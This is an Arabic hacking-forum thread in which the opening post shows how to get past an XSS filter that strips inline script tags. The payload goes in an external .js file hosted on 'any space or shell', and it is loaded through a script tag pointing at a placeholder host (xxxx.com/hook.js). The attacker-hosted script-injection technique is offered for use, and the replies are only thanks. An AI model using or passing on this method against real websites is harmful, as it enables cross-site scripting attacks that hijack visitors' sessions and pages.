حالة الموضوع:
مغلق
  1. rang171

    rang171 Developer

    الأنتساب:
    ‏6 نوفمبر 2012
    المشاركات:
    68
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    SaUdAi ArAbIa
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته

    اليوم معي اليوم طريقة اخرى لتخطى حماية منع محتوى سكربتات الجافا سكربت

    عند محاولة اختبار وجود ثغرة xss بالكود التانى

    كود PHP:
    <script>alert('pwn');</script>
    يقوم بحذف المحتوى بين تاجات السكربت

    external script Bypass:

    1- نفتح محرر النصوص

    2 - نقوم بحفظ ملف جديد بصيغة .js

    .js = javascript extension

    3 - نضع بدداخله الكود المراد تنفيذ كاالتالى

    كود PHP:
    alert('pwn');
    بدون تاجات السكربت

    4 - نرفعو على اى مساحة او شيل

    طريقة تشغيلو :

    كود PHP:
    <script src="http://www.xxxx.com/hook.js"></script>
    hook.js = اسم السكربت

    والنتيجة :

    [​IMG]

    )5:")5:")5:"
     
  2. AHMAD MOSAAD

    AHMAD MOSAAD Developer

    الأنتساب:
    ‏31 مارس 2012
    المشاركات:
    89
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الوظيفة:
    Student
    الإقامة:
    Egypt
    رد: Bypass Xss protection - external script

    بارك الله فيك اخى استمر يابطل )5:"​
     
  3. ĆѓÁćĶëŕ

    ĆѓÁćĶëŕ Developer

    الأنتساب:
    ‏3 مايو 2012
    المشاركات:
    47
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    ™عراق تيم
    رد: Bypass Xss protection - external script

    عليكم السلام ورحمة الله وبركاته

    بارك الله فيك يالغالي

    والله يعطيك الصحة العافية
     
  4. الـمـوج

    الـمـوج Developer

    الأنتساب:
    ‏11 يونيو 2012
    المشاركات:
    24
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    قطر
    رد: Bypass Xss protection - external script

    سلمت يداك اخي العزيز
     
  5. كراش المحارب

    كراش المحارب DeveloPer Plus

    الأنتساب:
    ‏26 ديسمبر 2012
    المشاركات:
    84
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    ksa
    رد: Bypass Xss protection - external script

    مشـــكوور حبيب قلـبي على الطرح ...
     
  6. Dr.H4CkEr

    Dr.H4CkEr DeveloPer Plus

    الأنتساب:
    ‏3 أكتوبر 2011
    المشاركات:
    209
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    18
    الإقامة:
    بلآد الحرمين .. الريآض ..
    رد: Bypass Xss protection - external script

    [​IMG]
     
  7. м̨я.ǚs̲ǝя

    м̨я.ǚs̲ǝя <div style="border-right: 5px solid; padding: 2px ExpErt DeveloPer

    الأنتساب:
    ‏16 ابريل 2014
    المشاركات:
    437
    الإعجابات المتلقاة:
    13
    نقاط الجائزة:
    18
    الإقامة:
    ★ الكردستان ★
    رد: Bypass Xss protection - external script

    جزك الله‌ خیر &:":
     
  8. تــــركــــي

    تــــركــــي DeveloPer Plus

    الأنتساب:
    ‏25 ابريل 2012
    المشاركات:
    180
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    16
    رد: Bypass Xss protection - external script

    جزاك الله كل الخير اخوي ^:ُok:ٌ^
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة